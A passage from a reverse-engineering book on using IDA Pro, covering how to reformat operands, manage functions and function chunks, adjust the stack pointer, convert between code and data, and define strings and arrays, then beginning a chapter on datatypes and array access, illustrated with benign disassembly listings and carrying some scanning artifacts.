004 83 EC 78 sub esp, 78h Y; Integer Subtraction

07C 8B 45 10 mov eax, [ebp+arg_8]

07C 89 45 F4 mov [ebp+var_C], eax

07C 8B 45 0C mov eax, [ebp+arg_4]

07C 89 45 A4 mov [ebp+var_5C], eax

07C C7 45 A0 0A [00+ mov [ebp+var_60], 0Ah

07C C6 45 A8 41 mov [ebp+var_58], 41h

07C 8B 45 A4 mov eax, [ebp+var_5C]

07C 89 44 24 04 mov [esp+4], eax

07C 8B 45 A0 mov eax, [ebp+var_60]

07C 89 04 24 mov [esp], eax

07C E8 91 FF FF FF call bar Y; Call Procedure

07C C9 leave Y; High Level Procedure Exit

000 C3 retn Y; Return Near from Procedure

You can further customize the disassembly display by adjusting the

indentation values and margins shown in the lower right of Figure 7-4. Any

changes to these options affect only the current database. Global settings for

each of these options are stored in the main configuration file, <IDADIR>/

cfg/ida.cfg.

112 Chapter 7

Formatting Instruction Operands

During the disassembly process, IDA makes many decisions regarding how

to format operands associated with each instruction. The biggest decisions

generally revolve around how to format various integer constants used by

the wide variety of instruction types. Among other things, these constants

can represent relative offsets in jump or call instructions, absolute addresses

of global variables, values to be used in arithmetic operations, or programmer-

defined constants. In order to make a disassembly more readable, IDA

attempts to use symbolic names rather than numbers whenever possible.

In some cases, formatting decisions are made based on the context of the

instruction being disassembled (such as a call instruction); in other cases,

the decision is based on the data being used (such as access to a global vari-

able or an offset into a stack frame). In many other cases, the exact context

in which a constant is being used may not be clear. When this happens, the

associated constant is typically formatted as a hexadecimal constant.

If you happen not to be one of the few people in the world who eat, sleep,

and breathe hex, then you will welcome IDA’s operand formatting features.

Right-clicking any constant in a disassembly opens a context-sensitive menu

similar to that shown in Figure 7-5.

Figure 7-5: Formatting options for constants

In this case, menu options are offered enabling the constant (41h) to

be reformatted as decimal, octal, or binary values. Since the constant in this

example falls within the ASCII printable range, an option is also presented to

format the value as a character constant. In all cases, the menu displays the

exact text that will replace the operand text should a particular option be

selected.

In many cases, programmers use named constants in their source code.

Such constants may be the result of #define statements (or their equivalent),

or they may belong to a set of enumerated constants. Unfortunately, by the

time a compiler is finished with the source code, it is no longer possible to

determine whether the source used a symbolic constant or a literal, numeric

constant. IDA maintains a large catalog of named constants associated with

many common libraries such as the C standard library or the Windows API.

Disassembly Manipulation 113

This catalog is accessible via the Use standard symbolic constant option on

the context-sensitive menu associated with any constant value. Selecting this

option for the constant 0Ah in Figure 7-5 opens the symbol-selection dialog

shown in Figure 7-6.

Figure 7-6: Symbol-selection dialog

The dialog is populated from IDA’s internal list of constants after filtering

according to the value of the constant we are attempting to format. In this

case we see all of the constants that IDA knows to be equated with the value

0Ah. If we determined that the value was being used in conjunction with the

creation of an X.25-style network connection, then we might select AF_CCITT

and end up with the following disassembly line:

.text:004010A2 mov [ebp+var_60], AF_CCITT

The list of standard constants is a useful way to determine whether a

particular constant may be associated with a known name and can save a lot

of time reading through API documentation in search of potential matches.

Manipulating Functions

There are a number of reasons that you may wish to manipulate functions

after the initial autoanalysis has been completed. In some cases, such as when

IDA fails to locate a call to a function, functions may not be recognized, as

there may be no obvious way to reach them. In other cases, IDA may fail to

properly locate the end of a function, requiring some manual intervention

on your part to correct the disassembly. IDA may have trouble locating the

end of a function if a compiler has split the function across several address

ranges or when, in the process of optimizing code, a compiler merges com-

mon end sequences of two or more functions in order to save space.

114 Chapter 7

Creating New Functions

Under certain circumstances, new functions can be created where no func-

tion exists. New functions can be created from existing instructions that do

not already belong to a function, or they can be created from raw data bytes

that have not been defined by IDA in any other manner (such as double

words or strings). You create functions by placing the cursor on the first byte

or instruction to be included in the new function and selecting Edit

FunctionsCreate Function. IDA attempts to convert data to code if neces-

sary. Then it scans forward to analyze the structure of the function and search

for a return statement. If IDA can locate a suitable end of the function, it

generates a new function name, analyzes the stack frame, and restructures

the code in the form of a function. If it can’t locate the end of the function

or encounters any illegal instructions, then the operation fails.

Deleting Functions

You can delete existing functions using EditFunctionsDelete Function.

You may wish to delete a function if you believe that IDA has erred in its

autoanalysis.

Function Chunks

Function chunks are commonly found in code generated by the Microsoft

Visual C++ compiler. Chunks are the result of the compiler moving blocks of

code that are less frequently executed in order to squeeze frequently executed

blocks into memory pages that are less likely to be swapped out.

When a function is split in such a manner, IDA attempts to locate all of

the associated chunks by following the jumps that lead to each chunk. In

most cases IDA does a good job of locating all of the chunks and listing each

chunk in the function’s header, as shown in the following partial function

disassembly:

.text:004037AE ChunkedFunc proc near

.text:004037AE

.text:004037AE var_420 = dword ptr -420h

.text:004037AE var_41C = dword ptr -41Ch

.text:004037AE var_4 = dword ptr -4

.text:004037AE hinstDLL = dword ptr 8

.text:004037AE fdwReason = dword ptr 0Ch

.text:004037AE lpReserved = dword ptr 10h

.text:004037AE

.text:004037AE ; FUNCTION CHUNK AT X.text:004040D7 SIZE 00000011 BYTES

.text:004037AE ; FUNCTION CHUNK AT .text:004129ED SIZE 0000000A BYTES

.text:004037AE ; FUNCTION CHUNK AT .text:00413DBC SIZE 00000019 BYTES

.text:004037AE

.text:004037AE push ebp

.text:004037AF mov ebp, esp

Disassembly Manipulation 115

Function chunks are easily reached by double-clicking the address associ-

ated with the chunk, as at X. Within the disassembly listing, function chunks

are denoted by comments that delimit their instructions and that refer to the

owning function, as shown in this listing:

.text:004040D7 ; START OF FUNCTION CHUNK FOR ChunkedFunc

.text:004040D7

.text:004040D7 loc_0040C0D7: ; CODE XREF: ChunkedFunc+72Çj

.text:004040D7 dec eax

.text:004040D8 jnz loc_403836

.text:004040DE call sub_4040ED

.text:004040E3 jmp loc_403836

.text:004040E3 ; END OF FUNCTION CHUNK FOR ChunkedFunc

In some cases IDA may fail to locate every chunk associated with a func-

tion, or functions may be misidentified as chunks rather than as functions in

their own right. In such cases, you may find that you need to create your own

function chunks or delete existing function chunks.

You create new function chunks by selecting the range of addresses that

belong to the chunk, which must not be part of any existing function, and

selecting EditFunctionsAppend Function Tail. At this point you will be

asked to select the parent function from a list of all defined functions.

NOTE In disassembly listings, function chunks are referred to as just that: function chunks. In

the IDA menu system, functions chunks are instead referred to as function tails.

You can delete existing function chunks by positioning the cursor on any

line within the chunk to be deleted and selecting EditFunctionsRemove

Function Tail. At this point you will be asked to confirm your action prior to

deleting the selected chunk.

If function chunks are turning out to be more trouble than they are worth,

you can ask IDA not to create function chunks by deselecting the Create func-

tion tails loader option when you first load a file into IDA. This option is one

of the loader options accessible via Kernel Options (see Chapter 4) in the

initial file-load dialog. If you disable function tails, the primary difference

that you may notice is that functions that would otherwise have contained

tails contain jumps to regions outside the function boundaries. IDA high-

lights such jumps using red lines and arrows in the arrow windows on the left

side of the disassembly. In the graph view for the corresponding function,

the targets of such jumps are not displayed.

Function Attributes

IDA associates a number of attributes with each function that it recognizes.

The function properties dialog shown in Figure 7-7 can be used to edit many

of these attributes. Each attribute that can be modified is explained here.

Name of function

An alternative means for changing the name of a function.

116 Chapter 7

Start address

The address of the first instruction in the function. IDA most often deter-

mines this automatically, either during analysis or from the address used

during the create function operation.

Figure 7-7: Function editing dialog

End address

The address following the last instruction in the function. Most fre-

quently, this is the address of the location that follows the function’s

return instruction. In most cases, this address is determined automati-

cally during the analysis phase or as part of function creation. In cases

where IDA has trouble determining the true end of a function, you may

need to edit this value manually. Remember, this address is not actually

part of the function but follows the last instruction in the function.

Local variables area

This represents the number of stack bytes dedicated to local variables

(see Figure 6-4) for the function. In most cases, this value is computed

automatically based on analysis of stack pointer behavior within the

function.

Saved registers

This is the number of bytes used to save registers (see Figure 6-4) on

behalf of the caller. IDA considers the saved register region to lie on top

of the saved return address and below any local variables associated with

the function. Some compilers choose to save registers on top of a func-

tion’s local variables. IDA considers the space required to save such regis-

ters as belonging to the local variable area rather than a dedicated saved

registers area.

Purged bytes

Purged bytes shows the number of bytes of parameters that a function

removes from the stack when it returns to its caller. For cdecl functions,

this value is always zero. For stdcall functions, this value represents the

Disassembly Manipulation 117

amount of space consumed by any parameters that are passed on the

stack (see Figure 6-4). In x86 programs, IDA can automatically determine

this value when it observes the use of the RET N variant of the return

instruction.

Frame pointer delta

In some cases, compilers may adjust a function’s frame pointer to point

somewhere into the middle of the local variable area rather than at the

saved frame pointer at the bottom of the local variable area. This distance

from the adjusted frame pointer to the saved frame pointer is termed the

frame pointer delta. In most cases any frame pointer delta will be computed

automatically when the function is analyzed. Compilers utilize a stack

frame delta as a speed optimization. The purpose of the delta is to keep

as many stack frame variables as possible within reach of a 1-byte signed

offset (–128..+127) from the frame pointer.

Additional attribute checkboxes are available to further characterize the

function. As with other fields within the dialog, these checkboxes generally

reflect the results of IDA’s automatic analysis. The following attributes can be

toggled on and off.

Does not return

The function does not return to its caller. When such a function is called,

IDA does not assume that execution continues following the associated

call instruction.

Far function

Used to mark a function as a far function on segmented architectures.

Callers of the function would need to specify both a segment and an

offset value when calling the function. The need to use far calls is typically

dictated by the memory model in use within a program rather than by

the fact that the architecture supports segmentation, for example, the

use of the large (as opposed to flat) memory model on an x86.

Library func

Flags a function as library code. Library code might include support

routines included by a compiler or functions that are part of a statically

linked library. Marking a function as a library function causes the function

to be displayed using the assigned library function coloring to distinguish

it from nonlibrary code.

Static func

Does nothing other than display the static modifier in the function’s

attribute list.

BP based frame

Indicates that the function utilizes a frame pointer. In most cases you

determine this automatically by analyzing the function’s prologue. If

analysis fails to recognize that a frame pointer is used in the given func-

tion, you can manually select this attribute. If you do manually select

this attribute, make sure that you adjust the saved register size (usually

118 Chapter 7

increased by the size of the saved frame pointer) and local variable size

(usually decreased by the size of the saved frame pointer) accordingly.

For frame pointer–based frames, memory references that make use of

the frame pointer are formatted to make use of symbolic stack variable

names rather than numeric offsets. If this attribute is not set, then stack

frame references are assumed to be relative to the stack pointer register.

BP equals to SP

Some functions configure the frame pointer to point to the top of the

stack frame (along with the stack pointer) upon entering a function.

This attribute should be set in such cases. This is essentially the same as

having a frame pointer delta equal in size to the local variable area.

Stack Pointer Adjustments

As we mentioned previously, IDA makes every effort to track changes to the

stack pointer at each instruction within a function. The accuracy that IDA

manages to achieve in doing so significantly impacts the accuracy of the

function’s stack frame layout. When IDA is unable to determine whether an

instruction alters the stack pointer, you may find that you need to specify a

manual stack pointer adjustment.

The most straightforward example of such a case occurs when one func-

tion calls another function that makes use of the stdcall calling convention.

If the function being called resides in a shared library that IDA does not

have knowledge of (IDA ships with knowledge of the signatures and calling

conventions of many common library functions), then IDA will be unaware

that the function utilizes stdcall and will fail to account for the fact that the

stack pointer will have been modified by the called function prior to return-

ing. Thus, IDA will reflect an inaccurate value for the stack pointer for the

remainder of the function. The following function call sequence, in which

some_imported_func resides in a shared library, demonstrates this problem

(note that the stack pointer line part option has been turned on):

.text:004010EB 01C push eax

.text:004010F3 020 push 2

.text:004010FB 024 push 1

Y.text:00401102 028 call some_imported_func

.text:00401107 X028 mov ebx, eax

Since some_imported_func uses stdcall, it cleans the three parameters from

the stack as it returns, and the correct stack pointer value at X should be 01C.

One way to fix this problem is to associate a manual stack adjustment with

the instruction at Y. Stack adjustments can be added by highlighting the

address to which the adjustment applies, selecting EditFunctionsChange

Stack Pointer (hotkey ALT-K), and specifying the number of bytes by which

the stack pointer changes, in this case 12.

While the previous example serves to illustrate a point, there is a

better solution to this particular problem. Consider the case in which

some_imported_func is called many different times. In that case, we would

need to make the stack adjustment we just made at each location from which

Disassembly Manipulation 119

some_imported_func is called. Clearly this could be very tedious, and we might

miss something. The better solution is to educate IDA regarding the behav-

ior of some_imported_func. Because we are dealing with an imported function,

when we attempt to navigate to it, we eventually end up at the import table

entry for that function, which looks something like the following entry:

.idata:00418078 ; Segment type: Externs

.idata:00418078 ; _idata

.idata:00418078 extrn some_imported_func:dword ; DATA XREF: sub_401034Çr

Even though this is an imported function, IDA allows you to edit one

piece of information concerning its behavior: the number of purged bytes

associated with the function. By editing this function, you can specify the

number of bytes that it clears off the stack when it returns, and IDA will

propagate the information that you supply to every location that calls the

function, instantly correcting the stack pointer computations at each of

those locations.

In order to improve its automated analysis, IDA incorporates advanced

techniques that attempt to resolve stack pointer discrepancies by solving a

system of linear equations related to the behavior of the stack pointer. As

a result, you may not even realize that IDA has no prior knowledge of the

details of functions such as some_imported_func. For more information on

these techniques, refer to Ilfak’s blog post titled “Simplex method in IDA

Pro” at http://hexblog.com/2006/06/.

Converting Data to Code (and Vice Versa)

During the automatic analysis phase, bytes are occasionally categorized incor-

rectly. Data bytes may be incorrectly classified as code bytes and disassembled

into instructions, or code bytes may be incorrectly classified as data bytes and

formatted as data values. This happens for many reasons, including the fact

that some compilers embed data into the code section of programs or the

fact that some code bytes are never directly referenced as code and IDA opts

not to disassemble them. Obfuscated programs in particular tend to blur the

distinction between code sections and data sections.

Regardless of the reason that you wish to reformat your disassembly,

doing so is fairly easy. The first option for reformatting anything is to remove

its current formatting (code or data). It is possible to undefine functions,

code, or data by right-clicking the item that you wish to undefine and select-

ing Undefine (also EditUndefine or hotkey U) from the resulting context-

sensitive menu. Undefining an item causes the underlying bytes to be refor-

matted as a list of raw byte values. Large regions can be undefined by using a

click-and-drag operation to select a range of addresses prior to performing

the undefine operation. As an example, consider the simple function listing

that follows:

.text:004013E0 sub_4013E0 proc near

.text:004013E0 push ebp

.text:004013E1 mov ebp, esp

120 Chapter 7

.text:004013E3 pop ebp

.text:004013E4 retn

.text:004013E4 sub_4013E0 endp

Undefining this function would yield the series of uncategorized bytes

shown here, which we could choose to reformat in virtually any manner:

.text:004013E0 unk_4013E0 db 55h ; U

.text:004013E1 db 89h ; ë

.text:004013E2 db 0E5h ; s

.text:004013E3 db 5Dh ; ]

.text:004013E4 db 0C3h ; +

To disassemble a sequence of undefined bytes, right-click the first byte

to be disassembled and select Code (also EditCode or hotkey C). This

causes IDA to disassemble all bytes until it encounters a defined item or an

illegal instruction. Large regions can be converted to code by using a click-

and-drag operation to select a range of addresses prior to performing the

code-conversion operation.

The complementary operation of converting code to data is a little more

complex. First, it is not possible to convert code to data using the context

menu. Available alternatives include EditData and the D hotkey. Bulk con-

versions of instructions to data are easiest to accomplish by first undefining all

of the instructions that you wish to convert to data and then formatting the

data appropriately. Basic data formatting is discussed in the following section.

Basic Data Transformations

Properly formatted data can be as important in developing an understanding

of a program’s behavior as properly formatted code. IDA takes information

from a variety of sources and uses many algorithms in order to determine the

most appropriate way to format data within a disassembly. A few examples

serve to illustrate how data formats are selected.

1. Datatypes and/or sizes can be inferred from the manner in which registers

are used. An instruction observed to load a 32-bit register from memory

implies that the associated memory location holds a 4-byte datatype

(though we may not be able to distinguish between a 4-byte integer and

a4-byte pointer).

2. Function prototypes can be used to assign datatypes to function param-

eters. IDA maintains a large library of function prototypes for exactly this

purpose. Analysis is performed on the parameters passed to functions

in an attempt to tie a parameter to a memory location. If such a relation-

ship can be uncovered, then a datatype can be applied to the associated

Disassembly Manipulation 121

memory location. Consider a function whose single parameter is a pointer

to a CRITICAL_SECTION (a Windows API datatype). If IDA can deter-

mine the address passed in a call to this function, then IDA can flag that

address as a CRITICAL_SECTION object.

3. Analysis of a sequence of bytes can reveal likely datatypes. This is precisely

what happens when a binary is scanned for string content. When long

sequences of ASCII characters are encountered, it is not unreasonable

to assume that they represent character arrays.

In the next few sections we discuss some basic transformations that you

can perform on data within your disassemblies.

Specifying Data Sizes

The simplest way to modify a piece of data is to adjust its size. IDA offers

a number of data size/type specifiers. The most commonly encountered

specifiers are db, dw, and dd, representing 1-, 2-, and 4-byte data, respectively.

The first way to change a data item’s size is via the OptionsSetup Data Types

dialog shown in Figure 7-8.

in the data carousel. Given the datatypes selected in Figure 7-8, right-clicking

a data item would offer you the opportunity to reformat that item as byte,

word, or double-word data.

There are two parts to this dialog.

The left side of the dialog contains a

column of buttons used to immediately

change the data size of the currently

selected item. The right side of the dialog

contains a column of checkboxes used

to configure what IDA terms the data

carousel. Note that for each button on

the left, there is a corresponding check-

box on the right. The data carousel is a

revolving list of datatypes that contains

only those types whose checkboxes are

selected. Modifying the contents of the

data carousel has no immediate impact

on the IDA display. Instead, each type on

the data carousel is listed on the context-

sensitive menu that appears when you

right-click a data item. Thus, it is easier

to reformat data to a type listed in the

data carousel than to a type not listed Figure 7-8: The datatype setup dialog

122 Chapter 7

The name for the data carousel derives from the behavior of the asso-

ciated data formatting hotkey: D. When you press D, the item at the currently

selected address is reformatted to the next type in the data carousel list. With

the three-item list specified previously, an item currently formatted as db

toggles to dw, an item formatted as dw toggles to dd, and an item formatted as

dd toggles back to db to complete the circuit around the carousel. Using the

data hotkey on a nondata item such as code causes the item to be formatted

as the first datatype in the carousel list (db in this case).

Toggling through datatypes causes data items to grow, shrink, or remain

the same size. If an item’s size remains the same, then the only observable

change is in the way the data is formatted. If you reduce an item’s size, from

dd (4 bytes) to db (1 byte) for example, any extra bytes (3 in this case) become

undefined. If you increase the size of an item, IDA complains if the bytes fol-

lowing the item are already defined and asks you, in a roundabout way, if you

want IDA to undefine the next item in order to expand the current item.

The message you encounter in such cases is “Directly convert to data?” This

message generally means that IDA will undefine a sufficient number of suc-

ceeding items to satisfy your request. For example, when converting byte

data (db) to double-word data (dd), 3 additional bytes must be consumed to

form the new data item.

Datatypes and sizes can be specified for any location that describes data,

including stack variables. To change the size of stack-allocated variables,

open the detailed stack frame view by double-clicking the variable you wish

to modify; then change the variable’s size as you would any other variable.

Working with Strings

IDA recognizes a large number of string formats. By default, IDA searches

for and formats C-style null-terminated strings. To force data to be converted

to a string, utilize the options on the EditStrings menu to select a specific

string style. If the bytes beginning at the currently selected address form a

string of the selected style, IDA groups those bytes together into a single-string

variable. At any time, you can use the A hotkey to format the currently selected

location in the default string style.

Two dialogs are responsible for the configuration of string data. The first,

shown in Figure 7-9, is accessed via OptionsASCII String Style, though

ASCII in this case is a bit of a misnomer, as a much wider variety of string

styles are understood.

Similar to the datatype configuration dialog, the buttons on the left are

used to create a string of the specified style at the currently selected location.

A string is created only if the data at the current location conforms to the

specified string format. For Character terminated strings, up to two termination

characters can be specified toward the bottom of the dialog. The radio buttons

on the right of the dialog are used to specify the default string style associ-

ated with the use of the strings hotkey (A).

Disassembly Manipulation 123

Figure 7-9: String data configuration

The second dialog used to configure string operations is the Options

General dialog, shown in Figure 7-10, where the Strings tab allows config-

uration of additional strings-related options. While you can specify the default

string type here as well using the available drop-down box, the majority of

available options deal with the naming and display of string data, regardless

of their type. The Name generation area on the right of the dialog is visible

only when the Generate names option is selected. When name generation is

turned off, string variables are given dummy names beginning with the asc_

prefix.

Figure 7-10: IDA Strings options

124 Chapter 7

When name generation is enabled, the Name generation options control

how IDA generates names for string variables. When Generate serial names is

not selected (the default), the specified prefix is combined with characters

taken from the string to generate a name that does not exceed the current

maximum name length. An example of such a string appears here:

.rdata:00402069 aThisIsACharact db 'This is a Character array',0

Title case is used in the name, and any characters that are not legal to

use within names (such as spaces) are omitted when forming the name.

The Mark as autogenerated option causes generated names to appear in a

different color (dark blue by default) than user-specified names (blue by

default). Preserve case forces the name to use characters as they appear

within the string rather than converting them to title case. Finally, Generate

serial names causes IDA to serialize names by appending numeric suffixes

(beginning with Number). The number of digits in generated suffixes is

controlled by the Width field. As configured in Figure 7-10, the first three

names to be generated would be a000, a001, and a002.

Specifying Arrays

One of the drawbacks to disassembly listings derived from higher-level lan-

guages is that they provide very few clues regarding the size of arrays. In a

disassembly listing, specifying an array can require a tremendous amount

of space if each item in the array is specified on its own disassembly line.

The following listing shows data declarations that follow the named variable

unk_402060. The fact that only the first item in the listing is referenced by any

instructions suggests that it may be the first element in an array. Rather than

being referenced directly, additional elements within arrays are often refer-

enced using more complex index computations to offset from the beginning

of the array.

.rdata:00402060 unk_402060 db 0 ; DATA XREF: sub_401350+8Ço

.rdata:00402060 ; sub_401350+18Ço

.rdata:00402061 db 0

.rdata:00402062 db 0

.rdata:00402063 db 0

.rdata:00402064 db 0

.rdata:00402065 db 0

.rdata:00402066 db 0

.rdata:00402067 db 0

.rdata:00402068 db 0

.rdata:00402069 db 0

.rdata:0040206A db 0

IDA provides facilities for grouping consecutive data definitions together

into a single array definition. To create an array, select the first element of the

array (we chose unk_402060) and use EditArray to launch the array-creation

dialog shown in Figure 7-11. If a data item has been defined at a given location,

Disassembly Manipulation 125

then an Array option will be available when you right-click the item. The type

of array to be created is dictated by the datatype associated with the item

selected as the first item in the array. In this case we are creating an array of

bytes.

Figure 7-11: Array-creation dialog

NOTE Prior to creating an array, make sure that you select the proper size for array elements by

changing the size of the first item in the array to the appropriate value.

Following are descriptions of useful fields for array creation:

Array element width

This value indicates the size of an individual array element (1 byte in this

case) and is dictated by the size of the data value that was selected when

the dialog was launched.

Maximum possible size

This value is automatically computed as the maximum number of

elements (not bytes) that can be included in the array before another

defined data item is encountered. Specifying a larger size may be possible

but will require succeeding data items to be undefined in order to absorb

them into the array.

Number of elements

This is where you specify the exact size of the array. The total number of

bytes occupied by the array can be computed as Number of elements ×

Array element width.

Items on a line

Specifies the number of elements to be displayed on each disassembly

line. This can be used to reduce the amount of space required to display

the array.

126 Chapter 7

Element width

This value is for formatting purposes only and controls the column width

when multiple items are displayed on a single line.

Use “dup” construct

This option causes identical data values to be grouped into a single item

with a repetition specifier.

Signed elements

Dictates whether data is displayed as signed or unsigned values.

Display indexes

Causes array indexes to be displayed as regular comments. This is useful

if you need to locate specific data values within large arrays. Selecting

this option also enables the Indexes radio buttons so you can choose the

display format for each index value.

Create as array

Not checking this may seem to go against the purpose of the dialog, and

it is usually left checked. Uncheck it if your goal is simply to specify some

number of consecutive items without grouping them into an array.

Accepting the options specified in Figure 7-11 results in the following

compact array declaration, which can be read as an array of bytes (db) named

byte_402060 consisting of the value 0 repeated 416 (1A0h) times.

.rdata:00402060 byte_402060 db 1A0h dup(0) ; DATA XREF: sub_401350+8Ço

.rdata:00402060 ; sub_401350+18Ço

The net effect is that 416 lines of disassembly have been condensed to a

single line (largely due to the use of dup). In the next chapter we will discuss

the creation of arrays within stack frames.

Summary

Together with the previous chapter, this chapter encompasses the most com-

mon operations that IDA users will ever need to perform. Through the use

of database modifications, you will combine your own knowledge with the

knowledge imparted by IDA during its analysis phase to produce much more

useful databases. As with source code, the effective use of names, assignment

of datatypes, and detailed comments will not only assist you in remembering

what you have analyzed but will also greatly assist others who may be required

to make use of your work. In the next chapter we continue to drill into IDA’s

capabilities by taking a look at how to deal with more complex data structures,

such as those represented by the C struct, and go on to examine some of the

low-level details of compiled C++.

JMP

EBP

SUB

DATATYPES AND

DATA STRUCTURES

The low-hanging fruit in understanding the

behavior of binary programs lies in catalog-

ing the library functions that the program calls.

AC program that calls the connect function is creating a

network connection. A Windows program that calls

RegOpenKey is accessing the Windows registry. Additional analysis is required,

however, to gain an understanding of how and why these functions are called.

Discovering how a function is called requires learning what parameters

are passed to the function. In the case of a connect call, beyond the simple

fact that the function is being called, it is important to know exactly what net-

work address the program is connecting to. Understanding the data that is

being passed into functions is the key to reverse engineering a function’s sig-

nature (the number, type, and sequence of parameters required by the func-

tion) and, as such, points out the importance of understanding how datatypes

and data structures are manipulated at the assembly language level.

128 Chapter 8

In this chapter we will examine how IDA conveys datatype information

to the user, how data structures are stored in memory, and how data within

those data structures is accessed. The simplest method for associating a spe-

cific datatype with a variable is to observe the use of the variable as a parame-

ter to a function that we know something about. During its analysis phase,

IDA makes every effort to annotate datatypes when they can be deduced

based on a variable’s use with a function for which IDA possesses a prototype.

When possible, IDA will go as far as using a formal parameter name lifted

from a function prototype rather than generating a default dummy name for

the variable. This can be seen in the following disassembly of a call to connect:

.text:004010F3 push 10h ; namelen

.text:004010F5 lea ecx, X[ebp+name]

.text:004010F8 push ecx ; name

.text:004010F9 mov edx, X[ebp+s]

.text:004010FF push edx ; s

.text:00401100 call connect

In this listing we can see that each push has been commented with the

name of the parameter that is being pushed (taken from IDA’s knowledge of

the function prototype). In addition, two local stack variables X have been

named for the parameters that they correspond to. In most cases, these

names will be far more informative than the dummy names that IDA would

otherwise generate.

IDA’s ability to propagate type information from function prototypes is

not limited to library functions contained in IDA’s type libraries. IDA can

propagate formal parameter names and data types from any function in your

database as long as you have explicitly set the function’s type information.

Upon initial analysis, IDA assigns dummy names and the generic type int to

all function arguments, unless through type propagation it has reason to do

otherwise. In any case, you must set a function’s type by using the Edit

FunctionsSet Function Type command, right-clicking on a function name,

and choosing Set Function Type on the context menu or using the Y hotkey.

For the function shown below, this results in the dialog shown in Figure 8-1,

in which you may enter the function’s correct prototype.

.text:00401050 ; ======== S U B R O U T I N E =========================

.text:00401050

.text:00401050 ; Attributes: bp-based frame

.text:00401050

.text:00401050 foo proc near ; CODE XREF: demo_stackframe+2AÈp

.text:00401050

.text:00401050 arg_0 = dword ptr 8

.text:00401050 arg_4 = dword ptr 0Ch

.text:00401050

.text:00401050 push ebp

.text:00401051 mov ebp, esp

Datatypes and Data Structures 129

As shown below, IDA assumes an int return type, correctly deduces that

the cdecl calling convention is used based on the type of ret instruction used,

incorporates the name of the function as we have modified it, and assumes

all parameters are of type int. Because we have not yet modified the argu-

ment names, IDA displays only their types.

Figure 8-1: Setting a function’s type

If we modify the prototype to read int __cdecl foo(float f, char *ptr),

IDA will automatically insert a prototype comment n for the function and

change the argument names o in the disassembly as shown below.

.text:00401050 ; ======== S U B R O U T I N E =========================

.text:00401050

.text:00401050 ; Attributes: bp-based frame

.text:00401050

.text:00401050 X; int __cdecl foo(float f, char *ptr)

.text:00401050 foo proc near ; CODE XREF: demo_stackframe+2AÈp

.text:00401050

.text:00401050 Yf = dword ptr 8

.text:00401050 Yptr = dword ptr 0Ch

.text:00401050

.text:00401050 push ebp

.text:00401051 mov ebp, esp

Finally, IDA propagates this information to all callers of the newly modi-

fied function, resulting in improved annotation of all related function calls

as shown here. Note that the argument names f and ptr have been propa-

gated out as comments p in the calling function and used to rename vari-

ables q that formerly used dummy names.

.text:004010AD mov eax, [ebp+qptr]

.text:004010B0 mov [esp+4], eax p; ptr

.text:004010B4 mov eax, [ebp+qf]

.text:004010B7 mov [esp], eax p; f

.text:004010BA call foo

Returning to imported library functions, it is often the case that IDA will

already know the prototype of the function. In such cases, you can easily view

the prototype by holding the mouse over the function name.1 When IDA has

no knowledge of a function’s parameter sequence, it should, at a minimum,

know the name of the library from which the function was imported (see the

Imports window). When this happens, your best resources for learning the

1. Holding the mouse over any name in the IDA display causes a tool tip–style pop-up window to

be displayed that shows up to 10 lines of disassembly at the target location. In the case of library

function names, this often includes the prototype for calling the library function.

130 Chapter 8

behavior of the function are any associated man pages or other available API

documentation (such as MSDN online2). When all else fails, remember the

adage: Google is your friend.

For the remainder of this chapter, we will be discussing how to recognize

when data structures are being used in a program, how to decipher the orga-

nizational layout of such structures, and how to use IDA to improve the read-

ability of a disassembly when such structures are in use. Since C++ classes are

a complex extension of C structures, the chapter concludes with a discussion

of reverse engineering compiled C++ programs.

Recognizing Data Structure Use

While primitive datatypes are often a natural fit with the size of a CPU’s regis-

ters or instruction operands, composite datatypes such as arrays and structures

typically require more complex instruction sequences in order to access the

individual data items that they contain. Before we can discuss IDA’s feature

for improving the readability of code that utilizes complex datatypes, we

need to review what that code looks like.

Array Member Access

Arrays are the simplest composite data structure in terms of memory layout.

Traditionally, arrays are contiguous blocks of memory that contain consecu-

tive elements of the same datatype. The size of an array is easy to compute, as

it is the product of the number of elements in the array and the size of each

element. Using C notation, the minimum number of bytes consumed by the

following array

int array_demo[100];

is computed as

int bytes = 100 * sizeof(int);

Individual array elements are accessed by supplying an index value,

which may be a variable or a constant, as shown in these array references:

Xarray_demo[20] = 15; //fixed index into the array

for (int i = 0; i < 100; i++) {

Yarray_demo[i] = i; //varying index into the array

}

Assuming, for the sake of example, that sizeof(int) is 4 bytes, then the

first array access at X accesses the integer value that lies 80 bytes into the

array, while the second array access at Y accesses successive integers at offsets

0, 4, 8, .. 96 bytes into the array. The offset for the first array access can be

computed at compile time as 20 * 4. In most cases, the offset for the second

2. Please see http://msdn.microsoft.com/library/.

Datatypes and Data Structures 131

array access must be computed at runtime because the value of the loop

counter, i, is not fixed at compile time. Thus for each pass through the loop,

the product i * 4 must be computed to determine the exact offset into the

array. Ultimately, the manner in which an array element is accessed depends

not only on the type of index used but also on where the array happens to be

allocated within the program’s memory space.

Globally Allocated Arrays

When an array is allocated within the global data area of a program (within

the .data or .bss section, for example), the base address of the array is known

to the compiler at compile time. The fixed base address makes it possible for

the compiler to compute fixed addresses for any array element that is accessed

using a fixed index. Consider the following trivial program that accesses a

global array using both fixed and variable offsets:

int global_array[3];

int main() {

int idx = 2;

global_array[0] = 10;

global_array[1] = 20;

global_array[2] = 30;

global_array[idx] = 40;

}

This program disassembles to the following:

.text:00401000 _main proc near

.text:00401000

.text:00401000 idx = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 push ecx

.text:00401004 mov [ebp+idx], 2

.text:0040100B Xmov dword_40B720, 10

.text:00401015 Ymov dword_40B724, 20

.text:0040101F Zmov dword_40B728, 30

.text:00401029 mov eax, [ebp+idx]

.text:0040102C [mov dword_40B720[eax*4], 40

.text:00401037 xor eax, eax

.text:00401039 mov esp, ebp

.text:0040103B pop ebp

.text:0040103C retn

.text:0040103C _main endp

While this program has only one global variable, the disassembly lines at

X, Y, and Z seem to indicate that there are three global variables. The com-

putation of an offset (eax * 4) at [ is the only thing that seems to hint at the

presence of a global array named dword_40B720, yet this is the same name as

the global variable found at X.

132 Chapter 8

Based on the dummy names assigned by IDA, we know that the global

array is made up of the 12 bytes beginning at address 0040B720. During the

compilation process, the compiler has used the fixed indexes (0, 1, 2) to

compute the actual addresses of the corresponding elements in the array

(0040B720, 0040B724, and 0040B728), which are referenced using the global

variables at X, Y, and Z. Using IDA’s array-formatting operations discussed

in the last chapter (EditArray), dword_40B720 can be formatted as a three-

element array yielding the alternate disassembly lines shown in the following

